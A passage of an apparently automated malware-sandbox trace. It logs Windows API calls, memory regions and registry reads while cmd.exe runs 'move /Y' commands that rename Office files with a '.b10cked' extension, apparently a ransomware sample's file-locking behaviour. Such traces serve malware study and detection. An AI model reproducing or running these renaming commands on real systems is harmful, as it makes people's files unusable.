lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0155.111] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.dll.trx_dll")) returned 0x2020 [0155.111] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0155.111] FindClose (in: hFindFile=0x372128 | out: hFindFile=0x372128) returned 1 [0155.111] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cecd8 | out: _Buffer=" 1") returned 9 [0155.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.111] GetFileType (hFile=0x7) returned 0x2 [0155.151] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0155.151] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cec64 | out: lpMode=0x1cec64) returned 1 [0155.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.151] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cec98 | out: lpConsoleScreenBufferInfo=0x1cec98) returned 1 [0155.151] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0155.152] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cecd8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0155.152] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x1cecbc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cecbc*=0x1a) returned 1 [0155.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.152] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0155.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.152] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0155.152] _get_osfhandle (_FileHandle=0) returned 0x3 [0155.152] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0155.153] SetConsoleInputExeNameW () returned 0x1 [0155.153] GetConsoleOutputCP () returned 0x1b5 [0155.153] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0155.153] SetThreadUILanguage (LangId=0x0) returned 0x409 [0155.153] exit (_Code=0) Process: id = "259" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21507 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21508 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21509 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21510 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 21511 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21512 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21513 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21514 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21515 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 21516 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21517 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21518 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21519 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21520 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 21521 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 21522 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21523 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21524 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21525 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21526 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21527 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21528 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21529 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21530 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21531 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 21532 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21533 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21534 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 21535 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 21536 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 21537 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 21538 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 21539 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 21540 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001190000" filename = "" Thread: id = 322 os_tid = 0x694 [0156.173] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8cc | out: lpSystemTimeAsFileTime=0x18f8cc*(dwLowDateTime=0x97051b60, dwHighDateTime=0x1d440a9)) [0156.173] GetCurrentProcessId () returned 0xd60 [0156.173] GetCurrentThreadId () returned 0x694 [0156.173] GetTickCount () returned 0x2fef6 [0156.173] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8c4 | out: lpPerformanceCount=0x18f8c4*=21296263353) returned 1 [0156.174] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0156.174] __set_app_type (_Type=0x1) [0156.174] __p__fmode () returned 0x76b331f4 [0156.174] __p__commode () returned 0x76b331fc [0156.174] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0156.175] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0156.175] GetCurrentThreadId () returned 0x694 [0156.175] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x694) returned 0x38 [0156.175] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0156.175] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0156.175] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.175] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0156.175] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f85c | out: phkResult=0x18f85c*=0x0) returned 0x2 [0156.175] VirtualQuery (in: lpAddress=0x18f893, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.175] VirtualQuery (in: 
lpAddress=0x90000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0156.175] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0156.175] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.175] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0156.175] GetConsoleOutputCP () returned 0x1b5 [0156.176] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.176] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0156.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0156.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0156.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.176] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.176] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0156.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.177] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0156.177] GetEnvironmentStringsW () returned 0x210210* [0156.177] FreeEnvironmentStringsW 
(penv=0x210210) returned 1 [0156.177] GetEnvironmentStringsW () returned 0x210210* [0156.177] FreeEnvironmentStringsW (penv=0x210210) returned 1 [0156.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7cc | out: phkResult=0x18e7cc*=0x40) returned 0x0 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0xa0, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x0, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x40, 
lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.178] RegCloseKey (hKey=0x40) returned 0x0 [0156.178] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7cc | out: phkResult=0x18e7cc*=0x40) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x0, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.178] RegCloseKey (hKey=0x40) 
returned 0x0 [0156.178] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637e [0156.178] srand (_Seed=0x5b88637e) [0156.178] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"" [0156.178] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"" [0156.178] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.179] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x211970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0156.179] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0156.179] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.179] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.179] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0156.179] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0156.179] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0156.179] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0156.179] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0156.179] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0156.179] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0156.179] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0156.179] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0156.179] GetEnvironmentStringsW () returned 0x212360* [0156.179] FreeEnvironmentStringsW (penv=0x212360) returned 1 [0156.180] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.180] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.180] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0156.180] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0156.180] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0156.180] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0156.180] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0156.180] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0156.180] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0156.180] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0156.180] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f598, lpFilePart=0x18f594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f594*="Desktop") returned 0x18 [0156.180] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0156.180] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x2109f0 [0156.180] FindClose (in: hFindFile=0x2109f0 | out: hFindFile=0x2109f0) returned 1 [0156.180] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x2109f0 [0156.184] FindClose (in: 
hFindFile=0x2109f0 | out: hFindFile=0x2109f0) returned 1 [0156.184] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x2109f0 [0156.185] FindClose (in: hFindFile=0x2109f0 | out: hFindFile=0x2109f0) returned 1 [0156.185] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0156.185] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0156.185] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0156.185] GetEnvironmentStringsW () returned 0x210210* [0156.185] FreeEnvironmentStringsW (penv=0x210210) returned 1 [0156.185] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.186] GetConsoleOutputCP () returned 0x1b5 [0156.186] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.186] GetUserDefaultLCID () returned 0x409 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="0") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="0") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="1") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0156.187] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0156.188] GetConsoleTitleW (in: lpConsoleTitle=0x200930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0156.188] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0156.188] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0156.188] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0156.189] _wcsicmp (_String1="move", _String2=")") returned 68 [0156.189] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0156.189] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0156.189] _wcsicmp (_String1="IF", _String2="move") returned -4 [0156.189] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0156.189] _wcsicmp (_String1="REM", _String2="move") returned 5 [0156.189] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0156.194] GetConsoleTitleW (in: lpConsoleTitle=0x18f3d0, nSize=0x104 | out: 
